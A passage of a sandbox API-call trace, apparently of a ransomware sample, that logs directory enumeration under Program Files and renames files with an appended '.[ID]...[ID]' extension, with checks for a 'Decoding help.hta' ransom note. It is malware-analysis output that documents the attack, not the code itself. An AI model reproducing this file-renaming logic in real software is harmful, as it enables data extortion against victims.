journal\\templates\\seyes.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.350] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5739f06, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5739f06, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x48795fdf, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1575a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shorthand.jtp", cAlternateFileName="")) returned 1 [0041.350] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.350] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.350] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.350] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.351] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Shorthand.jtp") returned -1 [0041.351] lstrlenW (lpString="Shorthand.jtp") returned 13 [0041.351] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.351] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Shorthand.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp" [0041.351] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp" [0041.351] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.351] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp" (normalized: "c:\\program files\\windows journal\\templates\\shorthand.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\shorthand.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.358] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5760063, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5760063, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x48e21c07, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7f5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="To_Do_List.jtp", cAlternateFileName="")) returned 1 [0041.358] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.358] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" [0041.358] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\templates\\decoding help.hta")) returned 0x1 [0041.358] lstrcmpiW (lpString1="Decoding help.hta", lpString2="To_Do_List.jtp") returned -1 [0041.358] lstrlenW (lpString="To_Do_List.jtp") returned 14 [0041.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*" [0041.358] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\*.*") returned 50 [0041.358] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\", lpString2="To_Do_List.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp" [0041.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp" [0041.358] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp.[ID]g9uZrLhJaygpwRm1[ID]" [0041.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp" (normalized: "c:\\program files\\windows journal\\templates\\to_do_list.jtp"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\templates\\to_do_list.jtp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.360] FindNextFileW (in: hFindFile=0x5d8150, lpFindFileData=0x908fd30 | out: lpFindFileData=0x908fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5760063, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5760063, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x48e21c07, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x7f5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="To_Do_List.jtp", cAlternateFileName="")) returned 0 [0041.360] FindClose (in: hFindFile=0x5d8150 | out: hFindFile=0x5d8150) returned 1 Thread: id = 263 os_tid = 0x920 [0040.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*", lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5770 [0041.502] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.502] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xa1afe884, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1afe884, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.502] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.502] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.502] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Calendar.Gadget", cAlternateFileName="CALEND~1.GAD")) returned 1 [0041.502] lstrcmpW (lpString1=".", lpString2="Calendar.Gadget") returned -1 [0041.502] lstrcmpW (lpString1="..", lpString2="Calendar.Gadget") returned -1 [0041.502] lstrcmpiW (lpString1="windows", lpString2="Calendar.Gadget") returned 1 [0041.502] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.502] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="Calendar.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget" [0041.503] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\*.*" [0041.503] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.503] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a18b40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.503] CloseHandle (hObject=0x350) returned 1 [0041.503] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Clock.Gadget", cAlternateFileName="CLOCK~1.GAD")) returned 1 [0041.504] lstrcmpW (lpString1=".", lpString2="Clock.Gadget") returned -1 [0041.504] lstrcmpW (lpString1="..", lpString2="Clock.Gadget") returned -1 [0041.504] lstrcmpiW (lpString1="windows", lpString2="Clock.Gadget") returned 1 [0041.504] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.504] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="Clock.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget" [0041.504] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\*.*" [0041.504] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.504] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9942b20, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.505] CloseHandle (hObject=0x350) returned 1 [0041.505] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CPU.Gadget", cAlternateFileName="CPU~1.GAD")) returned 1 [0041.505] lstrcmpW (lpString1=".", lpString2="CPU.Gadget") returned -1 [0041.505] lstrcmpW (lpString1="..", lpString2="CPU.Gadget") returned -1 [0041.505] lstrcmpiW (lpString1="windows", lpString2="CPU.Gadget") returned 1 [0041.505] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.505] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="CPU.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget" [0041.505] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0041.505] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.505] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a6cc28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.506] CloseHandle (hObject=0x350) returned 1 [0041.506] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Currency.Gadget", cAlternateFileName="CURREN~1.GAD")) returned 1 [0041.506] lstrcmpW (lpString1=".", lpString2="Currency.Gadget") returned -1 [0041.506] lstrcmpW (lpString1="..", lpString2="Currency.Gadget") returned -1 [0041.506] lstrcmpiW (lpString1="windows", lpString2="Currency.Gadget") returned 1 [0041.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.506] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="Currency.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget" [0041.506] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0041.506] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10a84c90, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.507] CloseHandle (hObject=0x350) returned 1 [0041.507] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa1afe884, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa8df54c, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa1cc85b8, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MediaCenter.Gadget", cAlternateFileName="MEDIAC~1.GAD")) returned 1 [0041.507] lstrcmpW (lpString1=".", lpString2="MediaCenter.Gadget") returned -1 [0041.507] lstrcmpW (lpString1="..", lpString2="MediaCenter.Gadget") returned -1 [0041.507] lstrcmpiW (lpString1="windows", lpString2="MediaCenter.Gadget") returned 1 [0041.507] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="MediaCenter.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget" [0041.507] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\MediaCenter.Gadget\\*.*" [0041.507] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.507] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5ea0008, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.508] CloseHandle (hObject=0x350) returned 1 [0041.508] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PicturePuzzle.Gadget", cAlternateFileName="PICTUR~1.GAD")) returned 1 [0041.508] lstrcmpW (lpString1=".", lpString2="PicturePuzzle.Gadget") returned -1 [0041.508] lstrcmpW (lpString1="..", lpString2="PicturePuzzle.Gadget") returned -1 [0041.508] lstrcmpiW (lpString1="windows", lpString2="PicturePuzzle.Gadget") returned 1 [0041.508] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.508] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.508] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="PicturePuzzle.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget" [0041.509] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0041.509] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.509] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5eb8070, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.510] CloseHandle (hObject=0x350) returned 1 [0041.510] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSSFeeds.Gadget", cAlternateFileName="RSSFEE~1.GAD")) returned 1 [0041.510] lstrcmpW (lpString1=".", lpString2="RSSFeeds.Gadget") returned -1 [0041.510] lstrcmpW (lpString1="..", lpString2="RSSFeeds.Gadget") returned -1 [0041.510] lstrcmpiW (lpString1="windows", lpString2="RSSFeeds.Gadget") returned 1 [0041.510] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.510] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.510] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="RSSFeeds.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget" [0041.510] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0041.510] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.510] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5de0938, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.511] CloseHandle (hObject=0x350) returned 1 [0041.511] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SlideShow.Gadget", cAlternateFileName="SLIDES~1.GAD")) returned 1 [0041.511] lstrcmpW (lpString1=".", lpString2="SlideShow.Gadget") returned -1 [0041.511] lstrcmpW (lpString1="..", lpString2="SlideShow.Gadget") returned -1 [0041.511] lstrcmpiW (lpString1="windows", lpString2="SlideShow.Gadget") returned 1 [0041.511] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*" [0041.511] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\*.*") returned 48 [0041.511] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\", lpString2="SlideShow.Gadget" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget" [0041.511] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*" [0041.511] GlobalMemoryStatus (in: lpBuffer=0x1369fd10 | out: lpBuffer=0x1369fd10) [0041.511] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5df89a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x350 [0041.512] CloseHandle (hObject=0x350) returned 1 [0041.512] FindNextFileW (in: hFindFile=0x5a5770, lpFindFileData=0x1369fd30 | out: lpFindFileData=0x1369fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weather.Gadget", cAlternateFileName="WEATHE~1.GAD")) returned 1 [0041.512] lstrcmpW (lpString1=".", lpString2="Weather.Gadget") returned 